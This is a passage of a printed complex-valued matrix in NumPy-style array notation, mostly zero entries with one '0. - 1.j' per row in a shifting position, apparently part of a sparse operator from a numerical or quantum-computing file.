0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
